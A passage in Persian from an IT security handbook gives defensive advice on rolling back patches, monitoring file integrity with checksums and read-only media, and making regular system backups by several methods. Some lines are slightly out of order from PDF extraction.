‫ﺍﻳﻦ ﻭﺍﺑﺴﺘﮕﻴﻬﺎ ﻫﻢ ﭘﻴﺪﺍ ﻭ ﻧﺼﺐ ﺷﻮﻧﺪ‪ .‬ﺑﻴﺸﺘﺮ )ﺍﻣﺎ ﻧﻪ ﻫﻤﺔ( ﺍﺻﻼﺣﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ ﺭﺍ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺧـﻮﺩ ﺭﺍ‬
‫‪ uninstall‬ﻛﻨﻨﺪ ﻭ ﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ‪ uninstall‬ﻛﺮﺩﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺭﺍﻫﻜﺎﺭ ﺩﻭﻡ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺘﻦ‪ ،‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳﺖ‪ .‬ﺑﺎ ﻧﮕﻬﺪﺍﺭﻱ ﻧﺴﺨﻪﻫـﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ‬
‫ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻋﻤﻮﻣﹰﺎ ﻧﺼﺐ ﻣﺠﺪﺩ ﻧﺴﺨﺔ ﻗﺒﻠﻲ ﻛﺎﺭ ﭼﻨﺪﺍﻥ ﻣﺸﻜﻠﻲ ﻧﻴﺴﺖ‪ .‬ﭼﻨﺪﻳﻦ ﻧﺴﺨﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺷـﺎﺧﻪﻫـﺎﻱ ﻣﺠـﺰﺍ ﺩﺭ ‪/usr/src‬‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ‪ ،‬ﻳﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪ ﻣﺎﻧﻨﺪ ‪ RCS‬ﻳﺎ ‪ CVS‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﭼﻨﺪﻳﻦ ﻧﺴﺨﻪ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ‬
‫ﻳﻚ ﺷﺎﺧﻪ ﻭﺍﺣﺪ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺷﺎﻳﺪ ﻣﻄﻤﺌﻦﺗﺮﻳﻦ ﺭﻭﺵ‪ ،‬ﺗﻬﻴﺔ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﭘﻴﺶ ﺍﺯ ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺎﺷﺪ ﺗﺎ ﭼﻨﺎﻧﭽﻪ ﻧﺼﺐ ﺍﺭﺗﻘﺎ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻧﺠﺎﻡ‬
‫ﻧﺸﺪ ﺑﺘﻮﺍﻥ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻧﺼﺐ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺍﺻﻼﺣﻬﺎﻱ ﺟﺪﻳﺪ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺑﻪﺭﻭﺯ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﻳﻚ ﻗﺴﻤﺖ ﻣﻬـﻢ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻳﻜﭙـﺎﺭﭼﮕﻲ‬
‫ﺍﺳﺖ‪ .‬ﻧﻜﺘﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻣﻬﻢ ﺍﺳﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺳﻴـﺴﺘﻢ ‪ -‬ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺎ ﺍﺭﺯﺵ ﺷـﻤﺎ ‪-‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﻧﺪﺍﺭﻳﺪ ﺗﻐﻴﻴﺮ ﻧﻤﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻫﻴﭻ ﻛﺎﺭﺑﺮ ﻳﺎ ﭘﺮﺩﺍﺯﺓ ﻏﻴﺮﻣﺠﺎﺯﻱ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﺪ‪ .‬ﺩﺭ ﻋﻤﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﺑﺮ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺑﻄﻮﺭ ﻣﺪﺍﻭﻡ ﻧﻈﺎﺭﺕ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻛﺸﻒ ﻭ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺁﺭﺷﻴﻮ ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻗﺒﻠﻲ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ‪.‬‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺑﺮﺍﻱ ﻣﺒﺎﺭﺯﻩ ﺑﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﻣﺮﺍﻗﺒﺖ ﺩﺭ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻛـﺎﺭﺑﺮﺍﻥ ﻭ ﻓﺎﻳﻠﻬـﺎ‪ ،‬ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﻣﻬﻤﻲ ﻛﻪ ﺩﻳﺮ ﺑﻪ ﺩﻳﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ‪-‬ﺧﻮﺍﻧﺪﻧﻲ‪ ١١٥‬ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ‪ .‬ﻓﺎﻳﻠﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ‬
‫ﺷﻮﻧﺪ ﺗﺎ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻧﻬﺎ ﺑﻪ ﮔﺬﺭ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺑﺎﺷﺪ‪) .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﺎﺭ‪ ،‬ﻫﻤﭽﻨﺎﻥ ﺣﺬﻑ ﻳﺎ ﺧـﺮﺍﺏ‬
‫ﻛﺮﺩﻥ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ‪(.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺷﻴﻮﻩﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭ ﻛﺮﺩﻥ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻮﭼﻜﺘﺮ ﻳﺎ ﻫﻨﮕﺎﻣﻴﮑﻪ ﺗﻌﺪﺍﺩ ﻓﺎﻳﻠﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻛﻪ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﻣﺤﻔﺎﻇﺖ ﺷﻮﺩ ﻣﺤﺪﻭﺩ ﺍﺳﺖ‪ ،‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻓﻘﻂ‪-‬ﻧﻮﺷﺘﻨﻲ‪ ١١٦‬ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮﻱ ﺑﺎﺷـﺪ‪.‬‬
‫ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺎ ﻫﻤﺘﺎﻫﺎﻱ ﺁﺭﺷﻴﻮﺷﺪﺓ ﺧﻮﺩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﮔﺮ ﻳﻚ ﻓﺎﻳﻞ ﺧﺮﺍﺏ ﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﺍﺣﻴﺎﻱ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ ،‬ﻭ ﻭﻗﺘﻲ ﻳﻚ ﺗﻐﻴﻴﺮ ﻣﺠﺎﺯ ﺑﻪ ﻓﺎﻳﻞ ﺩﺍﺩﻩ ﺷﻮﺩ‪ ،‬ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎ ﺁﻥ ﻫﻤﺎﻫﻨﮓ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫‪115 Read-Only Media‬‬
‫‪116 Write-Once Media‬‬
‫‪٣٠٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ‪ offline‬ﻣﺤﺎﺳﺒﻪ ﻭ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﺤﺖ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﭘﻴﺸﺘﺮ ﮔﻔﺘﻪ ﺷﺪ ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﻬﻢ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﻓﺎﻳﻞ ﺟﺪﻳﺪﻱ ﺗﻮﻟﻴﺪ ﻛﺮﺩ ﻛﻪ ﺧﻼﺻﺔ ﺁﻥ ﺑـﺎ‬
‫ﺧﻼﺻﺔ ﻣﺤﺎﺳﺒﻪ ﺷﺪﻩ ﺗﻄﺒﻴﻖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻤﻠﻜﺮﺩﻱ ﻣـﺸﺎﺑﻪ ‪ -‬ﻛـﻪ ﺍﻏﻠـﺐ ‪inoculation‬‬
‫ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺁﻧﺠﺎ ﻛﻪ ﺳﺮﺟﻤﻌﻬﺎ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬـﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻓـﺼﻞ ﭘـﻨﺠﻢ ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﻣﻘﺎﻳﺴﻪﺍﻱ ﻭ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﺮﺍﻱ ﻣﻤﻴﺰﻱ ﻣﺪﺍﻭﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺤﺚ ﻣﻔﺼﻠﺘﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ‬
‫ﻻ ﻋﻠﻴﺮﻏﻢ ﺑﻬﺘﺮﻳﻦ ﺗﻼﺷﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ‬
‫ﻧﻘﺼﻬﺎ‪ ،‬ﺣﻮﺍﺩﺙ‪ ،‬ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‪ ،‬ﻭ ﺣﻤﻼﺕ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﭘﻴﺶﺑﻴﻨﻲ ﻛﺮﺩ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﻮﺩ؛ ﺍﻣﺎ ﺍﮔﺮ ﭘﻴﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻧﻤﺎﻳﻴﺪ ﻭ ﺑﻪ ﻳﻚ ﻭﺿﻌﻴﺖ ﭘﺎﻳﺪﺍﺭ ﺑﺮﺳﺎﻧﻴﺪ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ‬
‫ﻼ ﺑﻪ ﻋﻠﺖ ﺁﺗﺶﺳﻮﺯﻱ ‪ -‬ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ‪ ،‬ﺑﺎ ﻳﻚ ﻣﺠﻤﻮﻋﺔ ﻛﺎﻣﻞ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑﻌـﺪ ﺍﺯ ﺧﺮﻳـﺪ ﺩﺳـﺘﮕﺎﻩ‬
‫ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ‪ -‬ﻣﺜ ﹰ‬
‫ﺟﺎﻳﮕﺰﻳﻦ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﺰﻳﻨﺔ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩ ﻭ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﺟﺪﻳﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺖ ﺑﻴﻤـﻪ ﺗـﺄﻣﻴﻦ ﺷـﻮﺩ‪ ،‬ﺍﻣـﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﭼﻴﺰﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﻻ ﺑﺪﻭﻥ ﺩﻟﻴـﻞ ﻣﺸﺨـﺼﻲ ﺧـﺮﺍﺏ ﻣـﻲﺷـﺪ ﻭ‬
‫ﺳﺎﻟﻬﺎ ﻗﺒﻞ‪ ،‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻛﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﭼﻮﻥ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻨﻬﺎ ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪ .‬ﺍﻣﺮﻭﺯ ﻫﻢ ﺧﺮﺍﺑﻲ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﻫﻨـﻮﺯ ﺩﻟﻴـﻞ ﺧـﻮﺑﻲ ﺑـﺮﺍﻱ ﺗﻬﻴـﻪ‬
‫ﻼ ﺗﺼﺎﺩﻓﻲ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﮐﻪ ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺳﺨﺖ ﺧﻮﺏ ﺑﻄـﻮﺭ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺖ‪ .‬ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﺩﻳﺴﮏ ﺳﺨﺖ ﻛﺎﻣ ﹰ‬
‫ﻣﺘﻮﺳﻂ ‪ ۵‬ﺳﺎﻝ ﻳﺎ ﻛﻤﻲ ﺑﻴﺸﺘﺮ ﻋﻤﺮ ﻛﻨﺪ‪ ،‬ﺳﺎﺯﻣﺎﻧﻲ ﺑﺎ ﺣﺪﻭﺩ ‪ ۲۰‬ﺗﺎ ‪ ۳۰‬ﺩﻳﺴﻚ ﺳﺨﺖ ﺑﺎﻳﺪ ﺩﺭ ﻫـﺮ ﭼﻨـﺪ ﻣـﺎﻩ ﻣﻨﺘﻈـﺮ ﻳـﻚ ﺧﺮﺍﺑـﻲ ﻗﺎﺑـﻞ‬
‫ﻻ ﺑﺪﻭﻥ ﻫﺸﺪﺍﺭ ﻗﺒﻠﻲ ﺧﺮﺍﺏ ﻣﻲﺷﻮﻧﺪ ‪ -‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺗﻨﻬﺎ ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﻼﺣﻈﻪ ﺑﺎﺷﺪ‪ .‬ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﮔﺮﻓﺘﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻛﺎﺭ ﻋﻘﻼﻧﻲ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺍﺳﺖ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺑﺰﺍﺭ ﻣﻬﻤﻲ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺨﺼﻮﺹ‪ ،‬ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ‬
‫ﻣﻲﺩﻫﺪ ﺑﺎ ﻣﻘﺎﻳﺴﺔ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ‪ ،‬ﺁﻧﭽﻪ ﺭﺍ ﻣﻬﺎﺟﻢ ﻋﻮﺽ ﻛﺮﺩﻩ ﺑﻴﺎﺑﻴﺪ‪ .‬ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻌﺪ ﺍﺯ ﻧﺼﺐ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﻧﺼﺐ ﻭ ﺍﺻﻼﺣﻬﺎﻱ ﻻﺯﻡ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻭﻟـﻴﻦ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﻤﻠﻪ ﺗﺤﻠﻴﻞ ﻛﻨﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﭼﻪ ﭼﻴـﺰﻱ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﻲ ﺳﺎﺧﺖ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﺩﻫﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻭﻗﻔﺔ ﺯﻣﺎﻧ ﹺ‬
‫ﭼﮕﻮﻧﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﻢ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺩﺭ ﺩﻳﺴﻚ ﻧﻮﺭﻱ ﻳﺎ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻣﺘﺤﺮﻙ ﺑﺎ ﻇﺮﻓﻴﺖ ﺯﻳﺎﺩ؛‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﻳﺴﻚ ﺩﺭ ﻳﻚ ﺩﻳﺴﻚ ‪ spare‬ﻳﺎ ﺍﻧﻌﻜﺎﺳﻲ؛‬
‫‪١١٧‬‬
‫ﺍﻧﻌﻜﺎﺳﻲ ﻛﺮﺩﻥ ﺩﻭ ﺩﻳﺴﻚ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ RAID‬ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛‬
‫ﺗﻬﻴﺔ ﺑﺎﻳﮕﺎﻧﻴﻬﺎﻱ ﺩﻭﺭﻩﺍﻱ ‪ ،sit ،zip‬ﻳﺎ ‪ tar‬ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ؛ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻧﻬـﺎ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﺍﻭﻟﻴـﻪ ﻭ ﻳـﺎ ﺩﺭ ﻣﻜـﺎﻧﻲ ﺩﻳﮕـﺮ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ؛‬
‫ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﻧﻮﺍﺭ ﻧﻮﺭﻱ ﻳﺎ ﻣﻐﻨﺎﻃﻴﺴﻲ؛ ﻭ‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻳﺎ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﻛـﻪ ﺻـﺎﺣﺐ ﺁﻥ ﻫـﺴﺘﻴﺪ‪ ،‬ﻳـﺎ ﺭﻭﻱ ﻳـﻚ ﺳـﺮﻭﻳﺲ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ‪.‬‬
‫‪117 Redundant Array of Independent Disks‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻼ ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺍﻣﺮﻭﺯﻩ ﭼﻨﺪﻳﻦ ﺷﻜﻞ ﻣﺨﺘﻠﻒ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﮐﻪ ﺫﻳ ﹰ‬
‫‪٣٠٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
